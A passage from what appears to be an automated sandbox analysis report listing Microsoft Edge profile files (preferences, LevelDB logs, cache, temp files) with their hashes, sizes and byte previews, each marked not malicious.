Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-66D3ED76-14DC.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.1298145890125596
Encrypted:	false
SSDEEP:	768:l5btJv3284RgAyNCSPIJqxKAqduoRGOHpYQ3MGZp3ORGO:l5hJvG84RjyNCaCAqduoRG45Pp3ORG
MD5:	E2C0A381A8A676E4B59008BEB96078E0
SHA1:	61DBB51B561C87A5F6461F7894DB827E431BFF84
SHA-256:	B628B04F1CCB4F3F93982389F979EF0AA9AA8F95C9B267A1D81A5460FB6C3E14
SHA-512:	5306F3D68A461AC8B3106304C5B2FC106C38D8C5B85A9EE9E92C920F1068304F4B50A4D8207003B24B46F162BDA3B8C56513E3F4882BBFE1E169D4D3AB7B54B4
Malicious:	false
Preview:	...@..@...@.....C.].....@................'..h...............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".iwkovu20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U].0r........>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2........V...... .2.........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.132041621771752
Encrypted:	false
SSDEEP:	3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5x1:o1ApdeaEqYsMazlYBVsJDu2ziy5
MD5:	845CFA59D6B52BD2E8C24AC83A335C66
SHA1:	6882BB1CE71EB14CEF73413EFC591ACF84C63C75
SHA-256:	29645C274865D963D30413284B36CC13D7472E3CD2250152DEE468EC9DA3586F
SHA-512:	8E0E7E8CCDC8340F68DB31F519E1006FA7B99593A0C1A2425571DAF71807FBBD4527A211030162C9CE9E0584C8C418B5346C2888BEDC43950BF651FD1D40575E
Malicious:	false
Preview:	sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\316ed2cb-c6d6-4ccc-aff7-d045b88dd09d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	7818
Entropy (8bit):	5.09177603887916
Encrypted:	false
SSDEEP:	192:stU0s0x8CZihnkasY8bV+FiA66WbfaFIMYqWbLMJ:stU0s0x8xhObGix6WbfaTYqd
MD5:	E4A45BD0DE77E871151B1CE9F1C12A76
SHA1:	A4E4B9253BF5E4CBF7131F131F16D424ECFEE74E
SHA-256:	32742A8239CAC9CB9228B34A78B21998A79CE6F8EF89C26287BDB8F7059123F0
SHA-512:	E0F3C0CA8F279E13CFBEC17CE04EEFC376457CB514CAE1FE5F707FFF4CBB39F0065719BE9305631DBFFBD1110641EF8D411047871B958D392F355569DB846670
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13369638510870078","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13369638510797344"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version":""},"edge":{

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\451520f0-5c72-4867-a495-24f5d9d12d9b.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\48c44eef-94ae-47cf-acc2-8db01fba413f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\77391917-fa1b-45ae-b7e8-5b60ef4835e4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	24691
Entropy (8bit):	5.568495917391831
Encrypted:	false
SSDEEP:	768:HEkMc3WPx8fKZ8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPO+w3rwPNVPfpxtuq:HEkMc3WPx8fKZu1jaCbwkFptJ
MD5:	5F043BBACBF35A57D3E8582298435A92
SHA1:	BC2CADAC7E598E0C479EE00FC303F02F54E55B5A
SHA-256:	A8918242BB241AA80EEC528CCD46E5F650D4D615B8D0A3130C337DD4045701DB
SHA-512:	6F51EA5E7060F39F491CC5FEFADED7948A84DF159EA5D04CAD56398497F0265CB11F8EEF762E87E782E368DF85FB69F3363439F86BE9EC8A69DE815BB0ABCE0A
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13369638510684788","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13369638510684788","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\7cacf774-f2c2-48c9-8bf1-32295130bcac.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.17780613060381
Encrypted:	false
SSDEEP:	6:PIM7N+q2P923oH+TcwtnG2tMsIFUt82IMX9dXZmw+2IMMjHNVkwO923oH+TcwtnB:PIMUv4Yebn9GFUt82IMtdX/+2IMAT5L5
MD5:	D99F0A3284F0A0BA809A6A75FF3CAC6E
SHA1:	287BBE2AEDB29BA7F3647C7B3502F7825B42E54A
SHA-256:	F8B6CF7E69D9F79EB28485812E050A45FE84C4C28BEAA1D15565F836BCC83002
SHA-512:	341F729DC69606AFCFB29AE54F06622E4338238C6C3A2235097BE9940FAD0735DEF15DDDB44863D82DC0A06BC38B9CA6AB060BB01401C6AA7BD2E695C62D5F81
Malicious:	false
Preview:	2024/09/01-00:28:30.763 2118 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/09/01-00:28:30.772 2118 Recovering log #3.2024/09/01-00:28:30.773 2118 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.17780613060381
Encrypted:	false
SSDEEP:	6:PIM7N+q2P923oH+TcwtnG2tMsIFUt82IMX9dXZmw+2IMMjHNVkwO923oH+TcwtnB:PIMUv4Yebn9GFUt82IMtdX/+2IMAT5L5
MD5:	D99F0A3284F0A0BA809A6A75FF3CAC6E
SHA1:	287BBE2AEDB29BA7F3647C7B3502F7825B42E54A
SHA-256:	F8B6CF7E69D9F79EB28485812E050A45FE84C4C28BEAA1D15565F836BCC83002
SHA-512:	341F729DC69606AFCFB29AE54F06622E4338238C6C3A2235097BE9940FAD0735DEF15DDDB44863D82DC0A06BC38B9CA6AB060BB01401C6AA7BD2E695C62D5F81
Malicious:	false
Preview:	2024/09/01-00:28:30.763 2118 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/09/01-00:28:30.772 2118 Recovering log #3.2024/09/01-00:28:30.773 2118 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old~RF3c380.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.17780613060381
Encrypted:	false
SSDEEP:	6:PIM7N+q2P923oH+TcwtnG2tMsIFUt82IMX9dXZmw+2IMMjHNVkwO923oH+TcwtnB:PIMUv4Yebn9GFUt82IMtdX/+2IMAT5L5
MD5:	D99F0A3284F0A0BA809A6A75FF3CAC6E
SHA1:	287BBE2AEDB29BA7F3647C7B3502F7825B42E54A
SHA-256:	F8B6CF7E69D9F79EB28485812E050A45FE84C4C28BEAA1D15565F836BCC83002
SHA-512:	341F729DC69606AFCFB29AE54F06622E4338238C6C3A2235097BE9940FAD0735DEF15DDDB44863D82DC0A06BC38B9CA6AB060BB01401C6AA7BD2E695C62D5F81
Malicious:	false
Preview:	2024/09/01-00:28:30.763 2118 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/09/01-00:28:30.772 2118 Recovering log #3.2024/09/01-00:28:30.773 2118 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	380
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWW
MD5:	9FE07A071FDA31327FA322B32FCA0B7E
SHA1:	A3E0BAE8853A163C9BB55F68616C795AAAF462E8
SHA-256:	E02333C0359406998E3FED40B69B61C9D28B2117CF9E6C0239E2E13EC13BA7C8
SHA-512:	9CCE621CD5B7CFBD899ABCBDD71235776FF9FF7DEA19C67F86E7F0603F7B09CA294CC16B672B742FA9B51387B2F0A501C3446872980BCA69ADE13F2B5677601D
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.148019294570747
Encrypted:	false
SSDEEP:	6:PIMLXNyq2P923oH+Tcwt8aPrqIFUt82IMpwvz1Zmw+2IMp7jRkwO923oH+Tcwt8h:PIMjNyv4YebL3FUt82IMah/+2IMxR5LE
MD5:	8177A75B6B9713E2589E4E9A9449910C
SHA1:	02CD5447C7C153EFE41382C80E0911DBC7C37132
SHA-256:	53B4C742740A89E7B8A4498A2ACE9405CAAB5A462D274475214D8957F8C5B59C
SHA-512:	CFB25D79A48F455D80AFAB43028D034C1F451890C4F02BFD84A9E6664C734972B275848505E653FBF121D7BC5D24623FCCC9E69A28C8EFC16412CCA9F3731DA3
Malicious:	false
Preview:	2024/09/01-00:28:30.776 2174 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/09/01-00:28:30.843 2174 Recovering log #3.2024/09/01-00:28:30.844 2174 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.148019294570747
Encrypted:	false
SSDEEP:	6:PIMLXNyq2P923oH+Tcwt8aPrqIFUt82IMpwvz1Zmw+2IMp7jRkwO923oH+Tcwt8h:PIMjNyv4YebL3FUt82IMah/+2IMxR5LE
MD5:	8177A75B6B9713E2589E4E9A9449910C
SHA1:	02CD5447C7C153EFE41382C80E0911DBC7C37132
SHA-256:	53B4C742740A89E7B8A4498A2ACE9405CAAB5A462D274475214D8957F8C5B59C
SHA-512:	CFB25D79A48F455D80AFAB43028D034C1F451890C4F02BFD84A9E6664C734972B275848505E653FBF121D7BC5D24623FCCC9E69A28C8EFC16412CCA9F3731DA3
Malicious:	false
Preview:	2024/09/01-00:28:30.776 2174 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/09/01-00:28:30.843 2174 Recovering log #3.2024/09/01-00:28:30.844 2174 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	380
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWW
MD5:	9FE07A071FDA31327FA322B32FCA0B7E
SHA1:	A3E0BAE8853A163C9BB55F68616C795AAAF462E8
SHA-256:	E02333C0359406998E3FED40B69B61C9D28B2117CF9E6C0239E2E13EC13BA7C8
SHA-512:	9CCE621CD5B7CFBD899ABCBDD71235776FF9FF7DEA19C67F86E7F0603F7B09CA294CC16B672B742FA9B51387B2F0A501C3446872980BCA69ADE13F2B5677601D
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.178283411363481
Encrypted:	false
SSDEEP:	6:PIMpQlyq2P923oH+Tcwt865IFUt82IMpQQR1Zmw+2IMpQbRkwO923oH+Tcwt86+e:PIM+lyv4Yeb/WFUt82IM+Qb/+2IM+bRB
MD5:	4C9835173DBF810BBFB6876AAE8A10BA
SHA1:	8F845CEF64D16454D1293998B4F1F5D74BD43D35
SHA-256:	B33A399AC567D37BFC28A95BAE2595C8AD241CD5E2302B70E67681C56F28A0CB
SHA-512:	B6A7E124A7B9A3736E991943E05D2A3463FF51A30DAE48EC71B9544CBCFC9F3DB4DF2BFCADBF83F49A2EDA751CD15F40642DCB80A6F4A56AD88A79BFCF61C143
Malicious:	false
Preview:	2024/09/01-00:28:30.850 2174 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/09/01-00:28:30.855 2174 Recovering log #3.2024/09/01-00:28:30.856 2174 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.178283411363481
Encrypted:	false
SSDEEP:	6:PIMpQlyq2P923oH+Tcwt865IFUt82IMpQQR1Zmw+2IMpQbRkwO923oH+Tcwt86+e:PIM+lyv4Yeb/WFUt82IM+Qb/+2IM+bRB
MD5:	4C9835173DBF810BBFB6876AAE8A10BA
SHA1:	8F845CEF64D16454D1293998B4F1F5D74BD43D35
SHA-256:	B33A399AC567D37BFC28A95BAE2595C8AD241CD5E2302B70E67681C56F28A0CB
SHA-512:	B6A7E124A7B9A3736E991943E05D2A3463FF51A30DAE48EC71B9544CBCFC9F3DB4DF2BFCADBF83F49A2EDA751CD15F40642DCB80A6F4A56AD88A79BFCF61C143
Malicious:	false
Preview:	2024/09/01-00:28:30.850 2174 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/09/01-00:28:30.855 2174 Recovering log #3.2024/09/01-00:28:30.856 2174 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1140
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
MD5:	914FD8DC5F9A741C6947E1AB12A9D113
SHA1:	6529EFE14E7B0BEA47D78B147243096408CDAAE4
SHA-256:	8BE3C96EE64B5D2768057EA1C4D1A70F40A0041585F3173806E2278E9300960B
SHA-512:	2862BF83C061414EFA2AC035FFC25BA9C4ED523B430FDEEED4974F55D4450A62766C2E799D0ACDB8269210078547048ACAABFD78EDE6AB91133E30F6B5EBFFBD
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.125112640707316
Encrypted:	false
SSDEEP:	6:PIC0Vq2P923oH+Tcwt8NIFUt82IES0gZmw+2IES0IkwO923oH+Tcwt8+eLJ:PICMv4YebpFUt82Ij9/+2IjP5LYebqJ
MD5:	7834B5C3C189E552153FD3C070D17EE1
SHA1:	DE9C23D129F723C7746B0854853BF93CF37ACC4D
SHA-256:	2DE768F8BAB3633C8DCB65224128C051932E9F9ACBB96865236A443AE3A585E0
SHA-512:	323AA23BA510C08D54A6F676D3362E60407BDF85BC63ED265C739CF37A067570E27BDC436AC779DB8EAC48CBCF1FEB0DAA5EB72CC0EC1C16DA8C59DFF1F67456
Malicious:	false
Preview:	2024/09/01-00:28:39.132 1064 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/09/01-00:28:39.133 1064 Recovering log #3.2024/09/01-00:28:39.133 1064 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.125112640707316
Encrypted:	false
SSDEEP:	6:PIC0Vq2P923oH+Tcwt8NIFUt82IES0gZmw+2IES0IkwO923oH+Tcwt8+eLJ:PICMv4YebpFUt82Ij9/+2IjP5LYebqJ
MD5:	7834B5C3C189E552153FD3C070D17EE1
SHA1:	DE9C23D129F723C7746B0854853BF93CF37ACC4D
SHA-256:	2DE768F8BAB3633C8DCB65224128C051932E9F9ACBB96865236A443AE3A585E0
SHA-512:	323AA23BA510C08D54A6F676D3362E60407BDF85BC63ED265C739CF37A067570E27BDC436AC779DB8EAC48CBCF1FEB0DAA5EB72CC0EC1C16DA8C59DFF1F67456
Malicious:	false
Preview:	2024/09/01-00:28:39.132 1064 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/09/01-00:28:39.133 1064 Recovering log #3.2024/09/01-00:28:39.133 1064 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old~RF3c3ed.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.125112640707316
Encrypted:	false
SSDEEP:	6:PIC0Vq2P923oH+Tcwt8NIFUt82IES0gZmw+2IES0IkwO923oH+Tcwt8+eLJ:PICMv4YebpFUt82Ij9/+2IjP5LYebqJ
MD5:	7834B5C3C189E552153FD3C070D17EE1
SHA1:	DE9C23D129F723C7746B0854853BF93CF37ACC4D
SHA-256:	2DE768F8BAB3633C8DCB65224128C051932E9F9ACBB96865236A443AE3A585E0
SHA-512:	323AA23BA510C08D54A6F676D3362E60407BDF85BC63ED265C739CF37A067570E27BDC436AC779DB8EAC48CBCF1FEB0DAA5EB72CC0EC1C16DA8C59DFF1F67456
Malicious:	false
Preview:	2024/09/01-00:28:39.132 1064 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/09/01-00:28:39.133 1064 Recovering log #3.2024/09/01-00:28:39.133 1064 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	270336
Entropy (8bit):	0.0018238520723782249
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zEfl:/M/xT02z
MD5:	1D398A6AA838A4E28DA47AE52901891F
SHA1:	389A75E59EB00BA4F5A285C59D96D11E08F1748F
SHA-256:	A8A19E1F6BABF4F13E6905B30614A0F5D17468962C21A60667870F2CAE9E013B
SHA-512:	4549CBEC5F9C10AB72872654DC7D60E752E7697B9A2EF92B7FAE6611F5957B8A9BF38C54A581E88A5970FE723791635992BB5CE36D2F3DAE312F93E77E898E2F
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.124302800091529
Encrypted:	false
SSDEEP:	6:PIqyq2P923oH+Tcwt8a2jMGIFUt82IoO1Zmw+2IjpRkwO923oH+Tcwt8a2jMmLJ:PIqyv4Yeb8EFUt82If/+2IVR5LYeb8bJ
MD5:	72053F59D56CF548E49AF4BC3D469E4E
SHA1:	2C9CF074F5FD25DA1B20ED0FBAA8A8772C047DDD
SHA-256:	1212F6D659E8499701698145A5B466125A21139FD6F2BD22D13A145832249AA1
SHA-512:	0C211C44E2783040010313A13FC937B9D14B739AABD983E3BA4496C3661E8DAF48BF52985D19A179248C4D13397F94770D371D9D08EFB93389EF8D08CC867D1E
Malicious:	false
Preview:	2024/09/01-00:28:31.596 2210 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/09/01-00:28:31.634 2210 Recovering log #3.2024/09/01-00:28:31.643 2210 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.124302800091529
Encrypted:	false
SSDEEP:	6:PIqyq2P923oH+Tcwt8a2jMGIFUt82IoO1Zmw+2IjpRkwO923oH+Tcwt8a2jMmLJ:PIqyv4Yeb8EFUt82If/+2IVR5LYeb8bJ
MD5:	72053F59D56CF548E49AF4BC3D469E4E
SHA1:	2C9CF074F5FD25DA1B20ED0FBAA8A8772C047DDD
